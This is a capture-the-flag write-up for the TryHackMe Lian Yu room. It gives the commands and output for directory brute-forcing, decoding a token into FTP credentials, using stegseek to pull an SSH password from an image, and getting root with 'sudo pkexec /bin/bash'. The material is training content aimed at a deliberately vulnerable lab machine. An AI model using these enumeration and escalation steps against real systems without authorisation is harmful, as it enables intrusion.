5 min read

TryHackMe Lian_Yu Writeup: Web Enumeration, Steganography & pkexec Privilege Escalation

TryHackMe Lian_Yu Writeup: Web Enumeration, Steganography & pkexec Privilege Escalation

Challenge Information

  • Platform: TryHackMe
  • Room name: Lian Yu
  • Theme: The TV series Arrow (Green Arrow)
  • Difficulty: Easy
  • Goal: Capture the User Flag and Root Flag
  • Room link: https://tryhackme.com/room/lianyu

Reconnaissance

Nmap Scan

nmap -Pn -sV -sC 10.201.90.112 -T4

Scan results:

PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.2
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
80/tcp  open  http    Apache httpd
|_http-title: Purgatory
111/tcp open  rpcbind 2-4 (RPC #100000)

Key findings:

  • The HTTP service title is "Purgatory"
  • FTP service vsftpd 3.0.2
  • SSH service (an older version)
  • RPC service (tested, but no NFS shares available)

Step 1: Web Enumeration - Finding the Way onto the Island

Web recon

curl http://10.201.90.112

Key clues:

<span class="h1-text"><b>ARROWVERSE</b></span>
<p>you had nothing but a bow and <b>arrow</b> to survive</p>
<background-image: url("Lianyu.png")>

Things to note:

  • "arrow" is specifically bolded
  • Background image Lianyu.png
  • The theme revolves around Oliver Queen and the island of Lian Yu

Directory Brute-Forcing

gobuster dir -u http://10.201.90.112/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 20 -x php,html,txt

Discovered:

/island               (Status: 301)

Visiting /island/

curl http://10.201.90.112/island/

Output:

Ohhh Noo, Don't Talk...............
I wasn't Expecting You at this Moment. I will meet you there
You should find a way to Lian_Yu as we are planed. The Code Word is:
vigilante

✅ Got the first clue: Code Word = "vigilante"

Step 2: Digging Deeper - Finding the 2100 Directory

Keep Brute-Forcing the /island/ Subdirectories

gobuster dir -u http://10.201.90.112/island -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 20 -x php,html,txt

Discovered:

/2100                 (Status: 301)
Background knowledge: 2100 is the year that Season 1 of Arrow is set in.

Visiting /island/2100/

curl http://10.201.90.112/island/2100/

Key HTML comment:

<h1>How Oliver Queen finds his way to Lian_Yu?</h1>
<iframe src="https://www.youtube.com/embed/X8ZiFuW41yY"></iframe>
<!-- you can avail your .ticket here but how? -->

✅ Hint: there's a file with a .ticket extension!

Step 3: Scanning for the .ticket File

Using Gobuster to scan for a specific extension

gobuster dir -u http://10.201.90.112/island/2100/ \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt \
  -x ticket -t 50

Discovered:

/green_arrow.ticket   (Status: 200)

Grabbing the Ticket Contents

curl http://10.201.90.112/island/2100/green_arrow.ticket

Output:

This is just a token to get into Queen's Gambit(Ship)

RTy8yhBQdscX

✅ Got a token: RTy8yhBQdscX

Queen's Gambit: the name of the Queen family's yacht in Arrow.

Step 4: Base58-Decoding to Get the FTP Credentials

Identifying the encoding type
The token RTy8yhBQdscX has these characteristics:

  • Contains upper- and lower-case letters and digits
  • 12 characters long
  • No special symbols

Trying Base58 decoding (using the Bugku online tool):

RTy8yhBQdscX (Base58) → !#th3h00d

✅ FTP credentials:

  • Username: vigilante
  • Password: !#th3h00d

Step 5: FTP Login and File Download

Logging into FTP

ftp 10.201.90.112
Name: vigilante
Password: !#th3h00d

Logged in successfully!

Listing Files

ftp> ls -la

Files found:

-rw-------  1 1001  1001      44 May 01 2020 .bash_history
-rw-r--r--  1 0     0       2483 May 01 2020 .other_user
-rw-r--r--  1 0     0     511720 May 01 2020 Leave_me_alone.png
-rw-r--r--  1 0     0     549924 May 05 2020 Queen's_Gambit.png
-rw-r--r--  1 0     0     191026 May 01 2020 aa.jpg

Download all the files

ftp> prompt off
ftp> mget *
ftp> mget .*
ftp> bye

Inspecting the key files

cat .bash_history
# Output: Sorry I couldn't Help Other user Might help

cat .other_user
# Output: Slade Wilson's full backstory (the Deathstroke character bio)

✅ Hint: the other user is "slade"

Step 6: Steganography Analysis - Extracting the SSH Password

Organizing the files

mkdir arrow_ctf
mv *.png *.jpg .other_user .bash_history arrow_ctf/
cd arrow_ctf/

Analyzing with StegSeek

stegseek aa.jpg

Output:

[i] Found passphrase: "password"
[i] Original filename: "ss.zip"
[i] Extracting to "aa.jpg.out"

✅ Steganography passphrase: password

Extract and Unzip

mv aa.jpg.out ss.zip
unzip ss.zip

Files after extraction:

passwd.txt  # just contains story flavor text
shado       # the real password file!

Getting the SSH Password

cat shado

Output:

M3tahuman

✅ SSH credentials:

  • Username: slade
  • Password: M3tahuman
Metahuman: matches the "metahuman super-soldiers" mentioned in the .other_user file.

Step 7: SSH Login to Grab the User Flag

SSH login

ssh [email protected]
Password: M3tahuman

Logged in successfully!

██╗    ██╗███████╗██╗      ██████╗ ██████╗ ███╗   ███╗███████╗██████╗
██║    ██║██╔════╝██║     ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗  ██║     ██║     ██║   ██║██╔████╔██║█████╗   █████╔╝
██║███╗██║██╔══╝  ██║     ██║     ██║   ██║██║╚██╔╝██║██╔══╝  ██╔═══╝
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
 ╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚══════╝
        ██╗     ██╗ █████╗ ███╗   ██╗     ██╗   ██╗██╗   ██╗
        ██║     ██║██╔══██╗████╗  ██║     ╚██╗ ██╔╝██║   ██║
        ██║     ██║███████║██╔██╗ ██║      ╚████╔╝ ██║   ██║
        ██║     ██║██╔══██║██║╚██╗██║       ╚██╔╝  ██║   ██║
        ███████╗██║██║  ██║██║ ╚████║███████╗██║   ╚██████╔╝
        ╚══════╝╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚═╝    ╚═════╝

User Flag

slade@LianYu:~$ cat user.txt
THM{Redacted}
                        --Felicity Smoak

✅ User Flag captured!

Step 8: Privilege Escalation to Root - sudo pkexec

Checking sudo privileges

sudo -l

Output:

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec

✅ Discovery: we can run pkexec via sudo!

pkexec | GTFOBins

Escalating with pkexec
pkexec is a PolicyKit tool that lets you run commands as another user.

sudo pkexec /bin/bash

Escalation successful!

root@LianYu:~# whoami
root

root@LianYu:~# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag

root@LianYu:~# cat /root/root.txt
                          Mission accomplished
You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE.

THM{Redacted}
                                                                              --DEATHSTROKE

Let me know your comments about this machine :)
I will be available @twitter @User6825

✅ Root Flag captured!

Mirakuru: the super-soldier serum in Arrow; Slade Wilson becomes Deathstroke after being injected with it.

Key Technical Takeaways

1. Web Enumeration Tips

  • HTML comment clues: the hint about the .ticket file
  • Extension-specific scanning: using gobuster -x ticket
  • Theme-driven guessing: 2100 (the year), green_arrow (the character)

2. Recognizing Base58 Encoding

Characteristics:

  • No easily confused characters (0, O, I, l)
  • Commonly used for cryptocurrency addresses
  • Relatively short and with no special symbols

Decoding tools:

3. FTP Enumeration

Key commands:

ls -la              # show hidden files
prompt off          # turn off prompting (for bulk downloads)
mget * and mget .*  # download every file (including hidden ones)

4. Steganography Toolchain

# Best tool for JPG files
stegseek image.jpg  # automatically brute-forces the passphrase

# For PNG files
zsteg image.png -a  # scan every steganography method

# General-purpose tools
strings image       # view readable strings
binwalk image       # detect embedded files
exiftool image      # inspect metadata

5. Linux Privilege Escalation - pkexec

Conditions:

  • The user has sudo rights to run pkexec
  • pkexec can execute arbitrary programs

Exploitation:

sudo pkexec /bin/bash  # get a root shell directly
sudo pkexec /bin/sh    # or use sh

Lessons Learned

This is one of the few boxes that requires directory brute-forcing, then more directory brute-forcing, over and over. It has a fair bit of "depth" to it, so it's worth a shot — I'd definitely recommend it. This time I won't explain every step in too much detail, since they're all fairly intuitive; you just need patience, and remember to swap out the small wordlist for a medium one when the small one comes up empty.